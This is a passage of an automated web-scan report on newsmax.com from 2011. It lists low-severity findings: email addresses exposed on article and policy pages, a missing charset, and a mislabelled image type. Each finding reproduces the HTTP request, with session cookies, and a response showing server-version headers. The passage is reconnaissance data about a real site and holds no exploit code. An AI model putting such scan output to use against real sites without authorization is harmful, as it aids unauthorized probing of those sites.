<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.2. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46166
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Bulim
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.3. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45512
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   HPV:
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.4. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.5. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45400
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   5 Thi
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.6. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46004
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Atten
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.7. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45952
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.8. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45685
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Top 5
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.9. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 63465
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Some
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.10. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

Issue detail

The following email address was disclosed in the response:

Request

GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 43446
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   'Supe
...[SNIP]...
<input type="text" id="ffInputSignUpEmail" class="ffInputSignUpEmail" value="example:bob@youremail.com" onclick ="this.value='';" />
...[SNIP]...
<input name="plc$lt$zoneContent$pageplaceholder$pageplaceholder$lt$zoneCenter$EmailSignupGhostbox$inputSignUpEmail" type="text" value="example:bob@youremail.com" id="plc_lt_zoneContent_pageplaceholder_pageplaceholder_lt_zoneCenter_EmailSignupGhostbox_inputSignUpEmail" class="inputSignUpEmail" onclick="this.value='';" />
...[SNIP]...

4.11. http://www.newsmax.com/PrivacyStatement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /PrivacyStatement

Issue detail

The following email addresses were disclosed in the response:

Request

GET /PrivacyStatement HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 37109
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
above. If you have purchased products, including subscriptions, from us in the past, you may also request that your Personal Data be removed from Newsmax's database by contacting Newsmax via e-mail at customerservice@Newsmax.com, in addition to the telephone number. In any instance, our removal of such information may require you to register again with Newsmax in the event you later wish full access to the Site.</p>
...[SNIP]...
<a href="mailto:customerservice@newsmax.com" target="_blank"><strong>customerservice@newsmax.com</strong>
...[SNIP]...

4.12. http://www.newsmax.com/TermsConditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /TermsConditions

Issue detail

The following email address was disclosed in the response:

Request

GET /TermsConditions HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 47377
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="mailto:customerservice@newsmax.com" target="_blank"><u>customerservice@newsmax.com</u>
...[SNIP]...

4.13. http://www.newsmax.com/advertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /advertise

Issue detail

The following email address was disclosed in the response:

Request

GET /advertise HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 28054
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="mailto:adcopy@newsmax.com">
...[SNIP]...

4.14. http://www.newsmax.com/contact  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /contact

Issue detail

The following email address was disclosed in the response:

Request

GET /contact HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 33292
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="mailto:jobs@newsmax.com?subject=Resume%20Submission">
...[SNIP]...

5. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /mainpop.htm

Request

GET /mainpop.htm HTTP/1.1
Host: www.newsmax.com
Proxy-Connection: keep-alive
Referer: http://www.newsmax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSPreferredCulture=en-US; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; OAX=rcHW802EtDQACEFj; RMFD=011Q0wWCO103C6qe|O103C7r2; popunder=yes

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 17 Aug 2010 15:23:44 GMT
Accept-Ranges: bytes
ETag: "040e42d203ecb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:51:32 GMT
Content-Length: 676

<html>

<head>
<META HTTP-EQUIV="expires" CONTENT="Wed, 1 JAN 2000 12:00:00 GMT">

<title></title>
<base target="_blank">
</head>

<body marginheight="0" marginwidth="0" leftmargin="0" topmar
...[SNIP]...

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /App_Themes/Newsmax/images/facebook.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /App_Themes/Newsmax/images/facebook.png HTTP/1.1
Host: www.newsmax.com
Proxy-Connection: keep-alive
Referer: http://www.newsmax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSPreferredCulture=en-US; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 03 May 2010 22:11:24 GMT
Accept-Ranges: bytes
ETag: "889bfa91debca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:48:38 GMT
Content-Length: 1447

GIF89a..,.......m.....Fb.Ql..........ay.]u.~...........s........l..............Wq.............Gc.`x.x..h~................;Y.............................................................................
...[SNIP]...

Report generated by XSS.CX at Sat Mar 19 09:35:52 CDT 2011.